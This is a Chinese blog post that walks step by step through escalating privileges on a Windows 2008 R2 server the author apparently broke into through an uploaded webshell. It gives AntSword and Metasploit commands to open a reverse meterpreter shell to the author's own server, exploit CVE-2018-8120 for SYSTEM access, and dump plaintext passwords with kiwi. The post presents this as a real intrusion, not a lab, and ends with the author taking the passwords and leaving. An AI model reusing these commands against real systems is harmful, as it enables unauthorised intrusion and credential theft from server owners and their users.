记一次实战windows 2008 R2 Datacenter 提权

前景:拿到某个站 getshell 上传马后发现权限低,然后就是漫长的提权过程

  1. 蚁剑连接到aspx 的马后进入终端先进行信息收集一波,使用命令whoami 可以发现是iis 的权限
    在这里插入图片描述
    使用命令 systeminfo 查看操作系统和打了哪些补丁等等,windows 2008 R2 Datacenter
    在这里插入图片描述
    只打了一个补丁
    在这里插入图片描述

  2. 可以使用蚁剑插件进行一个反弹shell,使用As-Exploits (挺好用的插件)
    在这里插入图片描述
    进入后可以先识别一下杀软,运气很好这台服务器没有安装杀软
    在这里插入图片描述

进行反弹shell(首先得在自己服务器上安装msf)
反弹shell 设置 服务器ip (81.X.X.253)
端口自己随便设置一个 (4613)
点击 exploit

在这里插入图片描述
服务器 81.x.x.253 进入msf

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 81.x.x.253
set lport 4613
exploit

在这里插入图片描述

反弹成功后getuid查看一下权限
在这里插入图片描述
确认是低权限,然后使用命令 background把当前的metasplouit shell 转换为后台执行

这里显示为session 3
在这里插入图片描述

sessions 查看一下 是 iis 的权限
在这里插入图片描述

然后 search cve-2018-8120 查找漏洞

use exploit/windows/local/ms18_8120_win32k_privesc 使用
在这里插入图片描述
show options 查看下需要设置什么东西
在这里插入图片描述
这里需要把session 设置一下
ip和端口也设置下吧

set session 3           # 刚刚转换到后台的session
set lhost 81.x.x.253    # 服务器ip
set lport 4686          # 端口
run

在这里插入图片描述

run 之后一直卡在那里,直接ctrl+c

再次使用 sessions 查看
在这里插入图片描述
system 权限 提权成功

然后进入 system 的shell
sessions -i 5
getuid 查看 已经是system 权限
在这里插入图片描述

获取密码

使用kiwi 模块
进程迁移的方式

ps 查看一下进程

在这里插入图片描述

migrate 632   # 进程迁移

load kiwi    # 加载kiwi模块

creds_all    # 列举系统中的明文密码

在这里插入图片描述
得到密码跑路


版权声明:本文为weixin_46079186原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。